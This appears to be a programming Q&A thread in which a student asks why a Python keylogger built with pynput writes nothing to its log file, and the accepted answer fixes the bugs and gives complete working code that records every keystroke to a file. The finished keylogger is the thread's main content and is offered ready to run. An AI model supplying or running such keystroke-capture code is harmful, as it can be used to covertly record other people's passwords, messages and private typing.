# Python Keylogger: .txt file won't save my keystrokes

Tags: python, keylogger

I am creating a keylogger with Python as part of a school project, and I so far enabled my program to record user keystrokes. I want those keystrokes to save to a file called 'log.txt' and I have written the code for it, but the 'log.txt' file, saves nothing and it is just blank.

How can I fix this? Here is my code.

```
count = 0
keys = [""]

def key_pressed(key):
    global keys, count
    keys = '{0}'.format(key)
    print(keys)
    
    

    if count >= 10:
        count = 0
        log_2_file(keys)
        keys = [""]

def log_2_file(keys):
     with open(file, path + ext + file, "a") as log_file:
         for key in keys:
             log_file(str(key))

def key_released(key):
    if key == keyboard.Key.esc:
        return False


with keyboard.Listener(on_press=key_pressed, on_release=key_released) as loop:
    loop.join()
```

Your help would be much appreciated, I have no idea where I am going wrong, and coming here is an absolute last resort.

(By the way, I'm coding in IDLE 3.7.0)

Comment: Have you tried `log_file.write(str(key))` instead of `log_file(str(key))`?

Comment: Yeah and log.txt is still blank

Comment: Look `open(file, path + ext + file, "a")`, I think it should be like this `open(path+file+ext, 'a')`, isn't it?

Comment: I just tried that now, thank you for the suggestion, but it still isn't working.

Answer (score 0, accepted):

You have made several mistakes in your code.

In the `log_2_file` function:

1. `with open(file, path + ext + file, "a")`. You pass three args to `open(...)` here. Although `open` supports more then 2 args, `buffering`, for instance (see [this question and answer](https://stackoverflow.com/questions/31869247/understanding-the-buffering-argument-of-the-io-open-method-in-python-2-7)), it looks that you have just mixed something up. So I replaced two first args (`file, path + ext + file`) with just `"keylogger.log"`.
2. `log_file('str(key)')`. `log_flie` is not a function here, it is a file object. It is not callable, and when you are about to write something in it, you should use its `.write(something)` method instead. You also should add `log_file.flush()` to be sure that changes appear immediately (not just after you `.close()` the file, or exit out of the `with open(...) as ...:` body)
3. You also should add "\n" after every key when you write it to the file, otherwise everything will be written into one line, without even a space between different keys.
4. You are setting `keys` to `[""]` before you are trying to write a block of 10 keypresses. It's a bad idea, because the first line of the log file is just empty. You have better write the `keys` to a file and then write a newline.

In the `key_pressed` function:

1. Why do you use `{0}.format(key)` instead of `str(key)`.
2. Presumably, you are trying to add the new key to the `keys` list. But instead you are just setting the `keys` value to the `str(key)`.
3. You don't change the `count` value at all, so it never equal to 10. On the contrary, it is always 0.
4. It's a bad idea to use `count >= 10`. Before it is going to be more than 10, it will definitely be `10` and the count will be 0 again. So, use `count == 10` instead.

Here is the updated version of code:

```
from pynput import keyboard


count, keys = 0, []

def log_2_file(keys):
    with open("keylogger.log", "a") as log_file:
        for key in keys:
            log_file.write(str(key) + "\n")
            log_file.flush()
        log_file.write("\n")
            
def key_pressed(key):
    global keys, count

    keys.append(str(key))
    count += 1
    
    if count == 10:
        log_2_file(keys)
        count, keys = 0, []             

def key_released(key):
    if key == keyboard.Key.esc:
        return False

with keyboard.Listener(on_press=key_pressed, on_release=key_released) as loop:
    loop.join()
```

Comment: Yes! Thank you so much for solving this problem! Much appreciated :)

Comment: As for the mistakes in my code, I am following a tutorial- and I didn't know they were actually mistakes, but thanks for pointing them out and helping me become a better coder :)